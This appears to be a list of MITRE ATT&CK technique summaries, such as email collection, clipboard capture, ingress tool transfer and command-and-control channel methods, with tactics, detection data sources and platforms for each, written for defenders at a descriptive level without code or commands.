Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre